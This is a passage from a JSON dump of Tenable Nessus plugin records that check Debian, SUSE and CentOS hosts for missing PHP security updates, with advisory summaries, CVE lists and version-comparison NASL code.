prefix:\"php5-intl\", reference:\"5.3.3.1-7+squeeze26\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-ldap\", reference:\"5.3.3.1-7+squeeze26\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-mcrypt\", reference:\"5.3.3.1-7+squeeze26\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-mysql\", reference:\"5.3.3.1-7+squeeze26\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-odbc\", reference:\"5.3.3.1-7+squeeze26\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-pgsql\", reference:\"5.3.3.1-7+squeeze26\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-pspell\", reference:\"5.3.3.1-7+squeeze26\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-recode\", reference:\"5.3.3.1-7+squeeze26\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-snmp\", reference:\"5.3.3.1-7+squeeze26\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-sqlite\", reference:\"5.3.3.1-7+squeeze26\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-sybase\", reference:\"5.3.3.1-7+squeeze26\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-tidy\", reference:\"5.3.3.1-7+squeeze26\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-xmlrpc\", reference:\"5.3.3.1-7+squeeze26\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-xsl\", reference:\"5.3.3.1-7+squeeze26\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:45:12", "references": ["https://www.suse.com/security/cve/CVE-2015-4024.html", "https://bugzilla.suse.com/931776", "https://www.suse.com/security/cve/CVE-2015-2787.html", "https://bugzilla.suse.com/924972", "https://www.suse.com/security/cve/CVE-2015-4022.html", "https://bugzilla.suse.com/931421", "https://bugzilla.suse.com/922022", "https://bugzilla.suse.com/925109", "https://bugzilla.suse.com/923946", "https://www.suse.com/security/cve/CVE-2015-2301.html", "https://www.suse.com/security/cve/CVE-2015-2783.html", "http://www.nessus.org/u?d03cc6d1", "https://www.suse.com/security/cve/CVE-2014-9709.html", "https://www.suse.com/security/cve/CVE-2014-9705.html", "https://www.suse.com/security/cve/CVE-2015-3329.html", "https://bugzilla.suse.com/928511", "https://www.suse.com/security/cve/CVE-2015-2305.html", "https://www.suse.com/security/cve/CVE-2015-4026.html", "https://bugzilla.suse.com/931769", "https://bugzilla.suse.com/922452", "http://www.nessus.org/u?48073445", "https://bugzilla.suse.com/931772", "https://bugzilla.suse.com/928506", "https://bugzilla.suse.com/922451", "https://www.suse.com/security/cve/CVE-2015-4021.html"], "pluginID": "84082", "description": "PHP 5.3 was updated to fix multiple security issues :\n\nbnc#931776: pcntl_exec() does not check path validity (CVE-2015-4026)\n\nbnc#931772: overflow in ftp_genlist() resulting in heap overflow (CVE-2015-4022)\n\nbnc#931769: memory corruption in phar_parse_tarfile when entry filename starts with NULL (CVE-2015-4021)\n\nbnc#931421: multipart/form-data remote denial-of-service vulnerability (CVE-2015-4024)\n\nbnc#928511: buffer over-read in unserialize when parsing Phar (CVE-2015-2783)\n\nbnc#928506: buffer over flow when parsing tar/zip/phar in phar_set_inode() (CVE-2015-3329)\n\nbnc#925109: SoapClient's __call() type confusion through unserialize()\n\nbnc#924972: use-after-free vulnerability in the process_nested_data function (CVE-2015-2787)\n\nbnc#923946: embedded gd copy: buffer read overflow in gd_gif_in.c (CVE-2014-9709)\n\nbnc#922452: built-in regular expression (regex) library contains a heap overflow vulnerability (CVE-2015-2305)\n\nbnc#922451: heap buffer overflow in enchant_broker_request_dict() (CVE-2014-9705)\n\nbnc#922022: php's built-in regular expression (regex) library contains a heap overflow vulnerability (CVE-2015-2301)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 5, "reporter": "Tenable", "published": "2015-06-10T00:00:00", "title": "SUSE SLES11 Security Update : php53 (SUSE-SU-2015:1018-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9705", "CVE-2015-2787", "CVE-2015-2783", "CVE-2015-3329", "CVE-2015-2301", "CVE-2014-9709", "CVE-2015-2305", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022"], "modified": "2018-07-31T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:php53-shmop", "p-cpe:/a:novell:suse_linux:php53-snmp", "p-cpe:/a:novell:suse_linux:php53-sysvsem", "p-cpe:/a:novell:suse_linux:php53-dba", "p-cpe:/a:novell:suse_linux:php53-pear", "p-cpe:/a:novell:suse_linux:php53-xsl", "p-cpe:/a:novell:suse_linux:php53-calendar", "p-cpe:/a:novell:suse_linux:php53-openssl", "p-cpe:/a:novell:suse_linux:php53", "p-cpe:/a:novell:suse_linux:php53-dom", "p-cpe:/a:novell:suse_linux:php53-odbc", "p-cpe:/a:novell:suse_linux:php53-ctype", "p-cpe:/a:novell:suse_linux:php53-zip", "p-cpe:/a:novell:suse_linux:php53-pgsql", "p-cpe:/a:novell:suse_linux:php53-pcntl", "p-cpe:/a:novell:suse_linux:php53-pspell", "p-cpe:/a:novell:suse_linux:apache2-mod_php53", "p-cpe:/a:novell:suse_linux:php53-gmp", "p-cpe:/a:novell:suse_linux:php53-gd", "p-cpe:/a:novell:suse_linux:php53-curl", "p-cpe:/a:novell:suse_linux:php53-gettext", "p-cpe:/a:novell:suse_linux:php53-iconv", "p-cpe:/a:novell:suse_linux:php53-bz2", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:php53-zlib", "p-cpe:/a:novell:suse_linux:php53-bcmath", "p-cpe:/a:novell:suse_linux:php53-fastcgi", "p-cpe:/a:novell:suse_linux:php53-json", "p-cpe:/a:novell:suse_linux:php53-sysvmsg", "p-cpe:/a:novell:suse_linux:php53-mbstring", "p-cpe:/a:novell:suse_linux:php53-ldap", "p-cpe:/a:novell:suse_linux:php53-xmlreader", "p-cpe:/a:novell:suse_linux:php53-suhosin", "p-cpe:/a:novell:suse_linux:php53-ftp", "p-cpe:/a:novell:suse_linux:php53-soap", "p-cpe:/a:novell:suse_linux:php53-sysvshm", "p-cpe:/a:novell:suse_linux:php53-fileinfo", "p-cpe:/a:novell:suse_linux:php53-mcrypt", "p-cpe:/a:novell:suse_linux:php53-intl", "p-cpe:/a:novell:suse_linux:php53-wddx", "p-cpe:/a:novell:suse_linux:php53-xmlrpc", "p-cpe:/a:novell:suse_linux:php53-tokenizer", "p-cpe:/a:novell:suse_linux:php53-pdo", "p-cpe:/a:novell:suse_linux:php53-xmlwriter", "p-cpe:/a:novell:suse_linux:php53-mysql", "p-cpe:/a:novell:suse_linux:php53-exif"], "id": "SUSE_SU-2015-1018-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=84082", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:1018-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84082);\n script_version(\"2.7\");\n script_cvs_date(\"Date: 2018/07/31 17:27:54\");\n\n script_cve_id(\"CVE-2014-9705\", \"CVE-2014-9709\", \"CVE-2015-2301\", \"CVE-2015-2305\", \"CVE-2015-2783\", \"CVE-2015-2787\", \"CVE-2015-3329\", \"CVE-2015-4021\", \"CVE-2015-4022\", \"CVE-2015-4024\", \"CVE-2015-4026\");\n script_bugtraq_id(72611, 73031, 73037, 73306, 73431, 74239, 74240, 74700, 74902, 74903, 75056);\n\n script_name(english:\"SUSE SLES11 Security Update : php53 (SUSE-SU-2015:1018-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"PHP 5.3 was updated to fix multiple security issues :\n\nbnc#931776: pcntl_exec() does not check path validity (CVE-2015-4026)\n\nbnc#931772: overflow in ftp_genlist() resulting in heap overflow\n(CVE-2015-4022)\n\nbnc#931769: memory corruption in phar_parse_tarfile when entry\nfilename starts with NULL (CVE-2015-4021)\n\nbnc#931421: multipart/form-data remote denial-of-service vulnerability\n(CVE-2015-4024)\n\nbnc#928511: buffer over-read in unserialize when parsing Phar\n(CVE-2015-2783)\n\nbnc#928506: buffer over flow when parsing tar/zip/phar in\nphar_set_inode() (CVE-2015-3329)\n\nbnc#925109: SoapClient's __call() type confusion through unserialize()\n\nbnc#924972: use-after-free vulnerability in the process_nested_data\nfunction (CVE-2015-2787)\n\nbnc#923946: embedded gd copy: buffer read overflow in gd_gif_in.c\n(CVE-2014-9709)\n\nbnc#922452: built-in regular expression (regex) library contains a\nheap overflow vulnerability (CVE-2015-2305)\n\nbnc#922451: heap buffer overflow in enchant_broker_request_dict()\n(CVE-2014-9705)\n\nbnc#922022: php's built-in regular expression (regex) library contains\na heap overflow vulnerability (CVE-2015-2301)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/922022\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/922451\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/922452\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/923946\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/924972\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/925109\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/928506\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/928511\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/931421\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/931769\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/931772\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/931776\"\n );\n # https://download.suse.com/patch/finder/?keywords=50901ea397c43cdc72e7b8b864450cd7\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d03cc6d1\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9705.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9709.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-2301.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-2305.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-2783.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-2787.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3329.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4021.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4022.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4024.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4026.html\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20151018-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?48073445\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 11 SP3 :\n\nzypper in -t patch sdksp3-apache2-mod_php53=10716\n\nSUSE Linux Enterprise Server 11 SP3 for VMware :\n\nzypper in -t patch slessp3-apache2-mod_php53=10716\n\nSUSE Linux Enterprise Server 11 SP3 :\n\nzypper in -t patch slessp3-apache2-mod_php53=10716\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! ereg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"apache2-mod_php53-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-bcmath-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-bz2-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-calendar-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-ctype-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-curl-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-dba-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-dom-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-exif-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-fastcgi-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-fileinfo-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-ftp-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-gd-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-gettext-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-gmp-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-iconv-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-intl-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-json-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-ldap-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-mbstring-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-mcrypt-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-mysql-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-odbc-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-openssl-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-pcntl-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-pdo-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-pear-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-pgsql-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-pspell-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-shmop-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-snmp-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-soap-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-suhosin-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-sysvmsg-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-sysvsem-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-sysvshm-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-tokenizer-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-wddx-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-xmlreader-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-xmlrpc-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-xmlwriter-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-xsl-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-zip-5.3.17-0.41.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-zlib-5.3.17-0.41.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php53\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:04:20", "references": ["http://www.nessus.org/u?8ed61604"], "pluginID": "84648", "description": "Updated php packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server.\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time. (CVE-2015-4024)\n\nAn uninitialized pointer use flaw was found in PHP's Exif extension. A specially crafted JPEG or TIFF file could cause a PHP application using the exif_read_data() function to crash or, possibly, execute arbitrary code with the privileges of the user running that PHP application. (CVE-2015-0232)\n\nAn integer overflow flaw leading to a heap-based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code.\n(CVE-2015-4022)\n\nMultiple flaws were discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code. (CVE-2015-0273, CVE-2015-2787, CVE-2015-4147, CVE-2015-4148, CVE-2015-4599, CVE-2015-4600, CVE-2015-4601, CVE-2015-4602, CVE-2015-4603)\n\nIt was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. (CVE-2015-4026, CVE-2015-3411, CVE-2015-3412, CVE-2015-4598)\n\nMultiple flaws were found in the way the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened.\n(CVE-2015-2301, CVE-2015-2783, CVE-2015-3307, CVE-2015-3329, CVE-2015-4021)\n\nA heap buffer overflow flaw was found in the enchant_broker_request_dict() function of PHP's enchant extension. An attacker able to make a PHP application enchant dictionaries could possibly cause it to crash. (CVE-2014-9705)\n\nA buffer over-read flaw was found in the GD library used by the PHP gd extension. A specially crafted GIF file could cause a PHP application using the imagecreatefromgif() function to crash. (CVE-2014-9709)\n\nA double free flaw was found in zend_ts_hash_graceful_destroy() function in the PHP ZTS module. This flaw could possibly cause a PHP application to crash. (CVE-2014-9425)\n\nAll php users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon must be restarted for the update to take effect.", "edition": 9, "reporter": "Tenable", "published": "2015-07-13T00:00:00", "title": "CentOS 6 : php (CESA-2015:1218)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9705", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-4601", "CVE-2015-2783", "CVE-2015-3329", "CVE-2015-2301", "CVE-2014-9425", "CVE-2014-9709", "CVE-2015-0273", "CVE-2015-4148", "CVE-2015-3307", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4602", "CVE-2015-4026", "CVE-2015-4147", "CVE-2015-3411", "CVE-2015-4600", "CVE-2015-4022", "CVE-2015-3412", "CVE-2015-4603", "CVE-2015-4599", "CVE-2015-4598", "CVE-2015-4643"], "modified": "2018-07-02T00:00:00", "cpe": ["p-cpe:/a:centos:centos:php-fpm", "p-cpe:/a:centos:centos:php-mbstring", "p-cpe:/a:centos:centos:php-bcmath", "cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:php-pgsql", "p-cpe:/a:centos:centos:php-enchant", "p-cpe:/a:centos:centos:php-recode", "p-cpe:/a:centos:centos:php", "p-cpe:/a:centos:centos:php-intl", "p-cpe:/a:centos:centos:php-ldap", "p-cpe:/a:centos:centos:php-snmp", "p-cpe:/a:centos:centos:php-xml", "p-cpe:/a:centos:centos:php-pdo", "p-cpe:/a:centos:centos:php-zts", 